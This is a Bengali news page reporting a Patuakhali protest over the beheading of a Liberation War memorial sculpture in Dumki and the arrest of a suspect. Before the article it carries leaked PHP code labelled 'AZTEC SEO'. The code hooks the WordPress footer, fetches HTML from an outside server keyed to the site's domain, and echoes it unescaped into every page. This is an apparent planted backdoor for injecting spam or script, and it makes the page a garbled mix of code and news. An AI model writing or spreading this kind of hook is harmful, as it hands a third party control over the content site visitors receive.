/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ভাস্কর্য ভাঙ্গার প্রতিবাদে পটুয়াখালীতে মুক্তিযুদ্ধ মঞ্চের মানববন্ধন | Dhaka Sky News

আনন্দের কথায় লায়লা-রাব্বির জুটি

আগের সংবাদ

নিহত ৬ জনের ৪ জনের বাড়ি বাউফলে

পরের সংবাদ

ভাস্কর্য ভাঙ্গার প্রতিবাদে পটুয়াখালীতে মুক্তিযুদ্ধ মঞ্চের মানববন্ধন

আলতাফ হোসেন জাকির

প্রকাশিত: January 16, 2023 , 8:30 pm

পটুয়াখালীর দুমকী উপজেলা কমপ্লেক্সের জয়বাংলা চত্বরে মুক্তিযুদ্ধের স্মৃতিস্তম্ভ (ভাস্কর্য) ভাঙ্গার প্রতিবাদে ও হামলাকারী এবং মদদদাতাদের দৃষ্টান্তমূলক শাস্তির দাবিতে মানববন্ধন ও বিক্ষোভ মিছিল করেছে বাংলাদেশ মুক্তিযুদ্ধ মঞ্চ পটুয়াখালী জেলা কমিটির সদস্যরা।
১৬ জানুয়ারি সোমবার বিকাল ৪টায় পটুয়াখালী প্রেসক্লাবের সামনে বাংলাদেশ মুক্তিযুদ্ধ মঞ্চ পটুয়াখালী জেলা কমিটির ব্যানারে শতাধিক সদস্যের ঘন্টাব্যাপী মানববন্ধন কর্মসূচীতে প্রধান অতিথি হিসাবে বক্তব্য রাখেন জেলা আওয়ামীলীগের সভাপতি বীর মুক্তিযোদ্ধা কাজী আলমগীর। বক্তব্য রাখেন মুক্তিযুদ্ধ মঞ্চ জেলা কমিটির সভাপতি মোঃ রফিক খান, সহ-সভাপতি সফিকুল ইসলাম সোহাগ, সাধারন সম্পাদক খাদিজা রায়হান, যুগ্ম সাধারন সম্পাদক মসিউর রহমান ঈসা ঘরামী, সাংগঠনিক সম্পাদক মোসাঃ ইজতেমা প্রমুখ। মানববন্ধন শেষে শহরে এক বিক্ষোভ মিছিল বের করে মুক্তিযুদ্ধ মঞ্চের সদস্যরা।
গত ২৩ শুক্রবার রাত সাড়ে ১০টার দিকে দুমকি উপজেলা কমপ্লেক্সের জয়বাংলা চত্ত্বরে জেলা পরিষদের অর্থায়নে নির্মিত মুক্তিযুদ্ধের স্মৃতিস্তম্ভের ওপরে উঠে শরিয়তুল্লাহ (২০) নামের যুবক মুক্তিযোদ্ধার প্রতিকৃতির মাথার অংশ ভেঙ্গে মাটিতে ফেলে দেয়। এসময় বিকট শব্দ শুনে উপজেলা পরিষদের নিরাপত্তা কর্মী ও কোয়ার্টারের কর্মকর্তা-কর্মচারীরা দৌড়ে পালানোর সময় যুবককে হাতে নাতে আটক করতে সক্ষম হন। ধৃত যুবকের গ্রামের বাড়ি উপজেলার দুমকি মাদ্রাসা ব্রিজ এলাকায়। তার পিতার নাম মিজানুর রহমান মৃধা। সে তবলিক জামায়াতের একজন সক্রিয় কর্মী। এ ঘটনায়
দুমকী উপজেলা ইউএনও আল ইমরানের নির্দেশে ধৃত যুবককে ওই রাতেই দুমকি থানা পুলিশে সোপর্দ করেন।
এ ব্যাপারে সাবেক উপজেলা মুক্তিযোদ্ধা কমান্ডার সৈয়দ গোলাম মর্তুজা বাদি হয়ে ওই যুবকের বিরুদ্ধে নাশকতামূলক ও রাষ্ট্রদ্রোহীতার অপরাধে একটি মামলা দায়ের করেন।
এ ঘটনার প্রতিবাদে ও জড়িতদের দৃষ্টান্তমূলক শাস্তির দাবীতে দুমকী ও পটুয়াখালীসহ বিভিন্ন স্তানে মানববন্ধন ও বিক্ষোভ অব্যাহত।